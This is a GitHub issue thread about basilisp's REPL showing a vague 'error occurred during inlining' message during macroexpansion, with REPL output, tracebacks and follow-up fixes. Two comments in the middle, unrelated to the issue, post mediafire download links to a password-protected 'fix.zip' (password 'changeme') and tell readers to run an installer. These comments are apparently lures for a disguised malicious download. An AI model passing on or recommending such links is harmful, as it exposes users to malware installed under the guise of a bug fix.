### ISSUE TITLE
REPL: General CompilerException message during macroexpansion masks specific error

### ISSUE THREAD

**Issue by ikappaki** [basilisp-lang/basilisp#1013]
Hi,

when performing macroexpansion, the CompilerException error message can be overly general, such as
```
error occurred during macroexpansion: error occurred during inlining
```

Although a more specific error exists in the exception chain, it's not visible.

To reproduce
- Open up the REPL and try to unquote an unknown symbol in a `defmacro`, you get a general error message about inlining, which doesn't help to identify the specific issue in a complex macro.
``` clojure
basilisp.user=> (defmacro issue [] `(~abc))

  exception: <class 'basilisp.lang.compiler.exception.CompilerException'> from <class 'basilisp.lang.compiler.exception.CompilerException'>
      phase: :macroexpansion
    message: error occurred during macroexpansion: error occurred during inlining
       form: (basilisp.core/fn issue [&env &form] (basilisp.core/seq (basilisp.core/concat (basilisp.core/list abc))))
   location: <REPL Input>:NO_SOURCE_LINE
```

In contrast, directly using the unquote provides a more specific and helpful error message
```clojure
basilisp.user=> `(~abc)

  exception: <class 'basilisp.lang.compiler.exception.CompilerException'> from <class 'basilisp.lang.compiler.exception.CompilerException'>
      phase: :inlining
    message: error occurred during inlining: unable to resolve symbol 'abc' in this context
       form: (basilisp.core/seq (basilisp.core/concat (basilisp.core/list abc)))
   location: <REPL Input>:NO_SOURCE_LINE
```

The specific error is available deeper in the compiler exception chain
```clojure
> poetry run basilisp run -c "(defmacro issue [] `(~abc))"
Traceback (most recent call last):
  File "C:\src\basilisp\src\basilisp\lang\compiler\analyzer.py", line 2639, in _invoke_ast
    return __handle_macroexpanded_ast(form, expanded, ctx)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
...
  File "C:\src\basilisp\src\basilisp\lang\compiler\analyzer.py", line 3661, in __resolve_bare_symbol
    raise ctx.AnalyzerException(
basilisp.lang.compiler.exception.CompilerException: unable to resolve symbol 'abc' in this context {:end-line 1 :col 21 :form abc :line 1 :file "<CLI Input>" :end-col 24 :phase :analyzing}

The above exception was the direct cause of the following exception:

Traceback (most recent call last):
           ^^^^^^^^^^^^^^^^^^^^^^
...
  File "C:\src\basilisp\src\basilisp\lang\compiler\analyzer.py", line 2647, in _invoke_ast
    raise CompilerException(
basilisp.lang.compiler.exception.CompilerException: error occurred during macroexpansion {:form (basilisp.core/fn issue [&env &form] ((basilisp.core/unquote abc))) :file "<CLI Input>" :phase :macroexpansion}
```

The expectation is that the more specific error message, such as "unable to resolve symbol 'abc' in this context," should be shown, aiding in better diagnosis of the issue.

Thanks

**Comment by internet-person** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ikappaki** [comment]
Hi @chrisrink10, thanks for the quick turnaround—that fixed the specific case I mentioned earlier.

However, I've encountered another, slightly more complex scenario where the general inlining error still occurs, even with the latest #1014 fix. The issue arises when I wrap an unquoted, unknown symbol inside a nested function call. For example:

```clojure
> poetry run basilisp repl
basilisp.user=> (defmacro issue [] `(str (str ~abc)))

  exception: <class 'basilisp.lang.compiler.exception.CompilerException'> from <class 'basilisp.lang.compiler.exception.CompilerException'>
      phase: :inlining
    message: error occurred during inlining: error occurred during inlining
       form: (basilisp.core/seq (basilisp.core/concat (basilisp.core/list (quote basilisp.core/str)) (basilisp.core/list (basilisp.core/seq (basilisp.core/concat (basilisp.core/list (quote basilisp.core/str)) (basilisp.core/list abc))))))
   location: <REPL Input>:NO_SOURCE_LINE
```

A more detailed error message is available in the full stack trace
```clojure
> poetry run basilisp run -c "(defmacro issue [] `(str (str ~abc)))"
Traceback (most recent call last):
...
  File "C:\src\basilisp\src\basilisp\lang\compiler\analyzer.py", line 3661, in __resolve_bare_symbol
    raise ctx.AnalyzerException(
basilisp.lang.compiler.exception.CompilerException: unable to resolve symbol 'abc' in this context {:file "<CLI Input>" :line 1 :end-col 33 :form abc :phase :analyzing :col 30 :end-line 1}

The above exception was the direct cause of the following exception:

Traceback (most recent call last):
...
  File "C:\src\basilisp\src\basilisp\lang\compiler\analyzer.py", line 2647, in _invoke_ast
    raise CompilerException(
basilisp.lang.compiler.exception.CompilerException: error occurred during macroexpansion {:file "<CLI Input>" :form (basilisp.core/fn issue [&env &form] (str (str (basilisp.core/unquote abc)))) :phase :macroexpansion}
```

Do you have any further ideas on what might still be causing this issue?

Thanks

**Comment by ikappaki** [comment]
> Do you have any further ideas on what might still be causing this issue?

Thanks, the latest fix in #1016 has resolved it as well.
